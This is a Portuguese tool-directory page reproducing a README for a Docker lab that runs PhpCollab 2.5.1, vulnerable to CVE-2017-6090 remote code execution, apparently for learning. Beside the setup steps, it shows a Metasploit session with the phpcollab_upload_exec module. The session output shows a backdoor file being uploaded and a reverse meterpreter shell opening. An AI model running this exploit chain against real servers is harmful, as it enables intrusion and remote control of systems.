Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
exploit-CVE-2017-6090 — Containerized exploitable PhpCollab | Kitploit
Ferramentas/GitHubGitHub/jlk/exploit-cve-2017-6090
Container SecurityExploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & Education
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

Containerized exploitable PhpCollab

Ver Repositório
1há 8 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Containerizado explorável CVE-2017-6090

Docker Pulls License

Este projeto constrói um container executando PhpCollab 2.5.1, contendo uma vulnerabilidade de execução remota de código conforme detalhado em CVE-2017-6090. Além disso, existe um arquivo docker-compose para iniciar esse container e o mysql para demonstrar o cenário, e as instruções para exploração estão abaixo.

Construir

docker build -t nomedocontainer . ou use a imagem jlkinsel/exploit-cve-2017-6090

Executar & Configurar

A maneira mais fácil de colocar isso em funcionamento é usar o arquivo docker-compose.yml incluído. Se eu ficar entediado em algum momento – ou se houver interesse – criarei um deployment kubernetes ou um helm chart.

Então, para iniciar:

root@kitploit:~
docker-compose up

Até aqui, tudo bem! Agora, o phpcollab precisa ser configurado para usar o banco de dados e receber uma senha de administrador padrão. Tentei (brevemente) automatizar isso, mas... bem... você parece saber como usar um navegador...

  • Navegue para http://localhost:8088
  • Role até o final da GPL, marque a caixa "Instalação offline" e clique em Passo 2
  • Insira os seguintes dados nos campos, depois clique em Salvar:

Finalmente, você pode fazer login e explorar, mas não é necessário para o exploit.

Nota

Observe que esta composição docker não está fazendo nada sofisticado para armazenamento. Se desejar persistir o banco de dados mysql, você precisará adicionar uma definição de volume à definição do serviço mysql no docker-compose.yml. Veja exemplos na página do mariadb no docker hub

Exploit

Primeiro – siga Executar & Configurar acima para colocar a aplicação em funcionamento.

Não adicionei um exploit neste projeto porque, bem, Metasploit.

Novato no MSF? Aqui está uma visão geral rápida de como explorar o container que acabamos de iniciar:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

Isso leva alguns minutos para inicializar. A página do remnux/metasploit no docker hub aborda o uso de volumes para que isso não demore tanto no futuro. Mas estamos quase lá!

Assim que obtiver um prompt de shell, vamos continuar:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

Neste ponto, você está dentro e os jogos podem começar.

Nota

Se o nome deste diretório for algo diferente de "exploit-CVE-2017-6090", você precisará alterar o comando --network acima.

Além disso – sim, definimos a porta remota como 80 no msfconsole, embora seja 8088 externamente. O container metasploit está na mesma rede que o container phpcollab.

Baixar ferramenta
Campovalor
Servidor de banco de dadosmysql
Login do banco de dadosphpcollab
Senha do banco de dadoschangeme
Nome do banco de dadosphpcollab
NotificaçõesFalse
Senha do administradorchangeme (ou o que você quiser)